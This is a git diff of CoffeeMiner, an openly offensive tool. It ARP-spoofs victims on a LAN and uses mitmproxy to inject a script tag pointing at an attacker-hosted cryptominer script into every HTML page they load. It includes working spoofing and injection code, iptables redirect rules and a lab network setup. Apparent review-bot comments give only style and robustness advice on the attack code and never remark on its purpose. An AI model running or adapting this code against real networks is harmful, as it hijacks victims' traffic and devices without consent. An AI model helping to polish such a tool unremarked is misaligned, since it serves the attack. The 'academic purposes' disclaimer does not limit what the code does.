diff --git a/README.md b/README.md index 3d685bc..c222e92 100644 --- a/README.md +++ b/README.md @@ -1,12 +1,12 @@ # CoffeeMiner -Collaborative Coffee Mining Pool. +Collaborative (mitm) cryptocurrency mining pool in wifi networks -**Warning: this project is only with academic purposes.** +**Warning: this project is for academic/research purposes only.** ## Concept -- Performs a MITM attack +- Performs a MITM attack to all selected victims - Injects a js script in all the HTML pages requested by the victims - The js script injected contains a cryptocurrency miner - All the devices victims connected to the Lan network, will be mining for the CoffeeMiner 
@@ -18,53 +18,16 @@ Collaborative Coffee Mining Pool. bash install.sh ``` - edit victims.txt with one IP per line -- run.py +- edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP: +```py +os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T") ``` -python run.py ipgateway +- run.py ``` - - - - ---- - - - -#### Manual use -- needs to have installed **mitmproxy** - https://mitmproxy.org/ - - installation: - ``` - sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev - - pip3 install --user mitmproxy - ``` - -- needs python 3.* - - -- configure IPTABLES - +python3 coffeeMiner.py ipgateway ``` -echo 1 > /proc/sys/net/ipv4/ip_forward -iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/network.png "network") -iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 -iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080 -``` -- arpspoof to the victims -``` -arpspoof -i eth0 -t -arpspoof -i eth0 -t -``` -- execute the httpServer.py that will serve the script.js that contains the minner: -``` -python httpServer.py -``` - -- execute the mitmproxy with the injector.py script: -``` -#~/.local/bin/mitmdump -s "injector.py http://127.0.0.1:8000/script.js" -``` +A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md diff --git a/run.py b/coffeeMiner.py similarity index 87% rename from run.py rename to coffeeMiner.py index 1b1bdbc..8854679 100644 --- a/run.py +++ b/coffeeMiner.py 
@@ -22,10 +22,10 @@ for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") # start the http server for serving the script.js, in a new console -os.system("xterm -hold -e 'python httpServer.py' &") +os.system("xterm -hold -e 'python3 httpServer.py' &") # start the mitmproxy -os.system("~/.local/bin/mitmdump -s 'injector.py http://127.0.0.1:8000/script.js'") +os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T") ''' diff --git a/injector.py b/injector.py index 6f386b5..1d6057a 100644 --- a/injector.py +++ b/injector.py @@ -2,25 +2,44 @@ # (this script works best with --anticache) from bs4 import BeautifulSoup from mitmproxy import ctx, http - +import argparse class Injector: + ''' def load(self, loader): loader.add_option( "scr_url", str, "", "script_url to inject" ) + ''' + def __init__(self, path): + self.path = path def response(self, flow: http.HTTPFlow) -> None: - if ctx.options.scr_url: + #print("hola hola hola") + #print(self.path) + + if self.path: html = BeautifulSoup(flow.response.content, "html.parser") - if html.body: + print(self.path) + print(flow.response.headers["content-type"]) + if flow.response.headers["content-type"] == 'text/html': + print("uuuuuu") + print(flow.response.headers["content-type"]) + print("asdf asdf asdf asdf asdf") + print("-----") + print("mmmmm") script = html.new_tag( "script", - src=context.src_url, + src=self.path, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html).encode("utf8") - context.log("Script injected.") + print("Script injected.") +def start(): + parser = argparse.ArgumentParser() + parser.add_argument("path", type=str) + args = parser.parse_args() + return Injector(args.path) -addons = [Injector()] +#addons = [Injector()] diff --git a/install.sh b/install.sh index 2ca1e9e..8a4fe1d 100644 --- a/install.sh +++ b/install.sh 
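Review bot: The replacement `mitmdump` line embeds the address `10.0.2.20` inside the shell string, and the README hunk in this commit tells users to change it by editing "line 28", a reference that goes stale as soon as the file shifts. A named value near the top of the file, for example `SCRIPT_URL = "http://10.0.2.20:8000/script.js"  # lab httpserver address, see virtualbox_scenario_instructions.md`, would keep the lab-specific setting in one documented place. The added `-T` switch has no comment either, so a short note on what it selects and which mitmproxy release the script expects would help, since nothing on the page pins a version. The script begins and ends outside this hunk.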
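Review bot: The new `response` body ships with leftover debugging output: `print("uuuuuu")`, `print("asdf asdf asdf asdf asdf")`, `print("-----")`, `print("mmmmm")` and two duplicate prints of the content-type header. It also disables the old `load` method by wrapping it in a `'''` string instead of deleting it. Those lines should go, together with `#print("hola hola hola")` and the commented-out `#addons = [Injector()]`, leaving the single `print("Script injected.")` status line. `import argparse` is added directly under the mitmproxy import and the separating blank line is removed, whereas PEP 8 puts the standard-library import first in its own group. `Injector.__init__` and `start()` have no docstrings, and one line on each saying that `path` is the script URL taken from the command-line argument would document the new entry point.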
@@ -1,10 +1,10 @@ #TODO put --yes to all installation commands # install arpspoof (dsniff) -sudo apt-get install dsniff +apt-get -y install dsniff # install mitmproxy -sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev +apt-get -y install python3-dev python3-pip libffi-dev libssl-dev pip3 install --user mitmproxy # install BeautifulSoup diff --git a/miner_script/script.js b/miner_script/script.js index 0c74210..42c71de 100644 --- a/miner_script/script.js +++ b/miner_script/script.js @@ -1 +1 @@ -alert("this will be the minner"); +alert("if you can read this, the script has been injected. This will be the minner"); diff --git a/network.png b/network.png new file mode 100644 index 0000000..d7079e5 Binary files /dev/null and b/network.png differ diff --git a/virtualbox_scenario_instructions.md b/virtualbox_scenario_instructions.md new file mode 100644 index 0000000..29033af --- /dev/null +++ b/virtualbox_scenario_instructions.md 
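Review bot: With `sudo` dropped from both `apt-get` lines the script only works when started as root, but nothing checks for that and there is no `set -e`, so a failed `apt-get` falls through to `pip3 install --user mitmproxy`. Adding `set -eu` at the top and a guard such as `[ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; exit 1; }` makes that failure explicit. Running as root also means `--user` installs into root's home, and the package is fetched without a version pin, so the installed release is whatever the index serves that day; pinning it is worth considering. The `#TODO put --yes to all installation commands` comment is partly done by this hunk and should be updated or removed. The rest of the script lies outside the hunk.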
@@ -0,0 +1,78 @@
+### Instructions to setup VirtualBox scenario
+
+
+In each machine, remember to setup the dns server, for example, in /etc/resolv.conf:
+
+```
+nameserver 8.8.8.8
+```
+
+### Victim
+- network adapter:
+ - Host-only Adapter
+- /etc/network/interfaces:
+
+```
+auto lo
+iface lo inet loopback
+
+auto eth0
+iface eth0 inet static
+ address 10.0.2.20
+ netmask 255.255.255.0
+ gateway 10.0.2.15
+```
+
+### Attacker
+- network adapter:
+ - Host-only Adapter
+- /etc/network/interfaces:
+
+```
+auto lo
+iface lo inet loopback
+
+auto eth0
+iface eth0 inet static
+ address 10.0.2.10
+ netmask 255.255.255.0
+ gateway 10.0.2.15
+```
+
+
+### Gateway
+- network adapter:
+ - Bridged Adapter
+ - Host-only Adapter
+- /etc/network/interfaces:
+
+```
+auto lo
+iface lo inet loopback
+
+auto eth0
+iface eth0 inet dhcp
+
+auto eth1
+iface eth1 inet static
+ address 10.0.2.15
+ netmask 255.255.255.0
+```
+
+Clean IPTABLES:
+
+```
+iptables --flush
+iptables --table nat --flush
+```
+
+Configure the Gateway machine as a router:
+
+```
+echo 1 > /proc/sys/net/ipv4/ip_forward
+
+iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+
+iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
+iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT
+```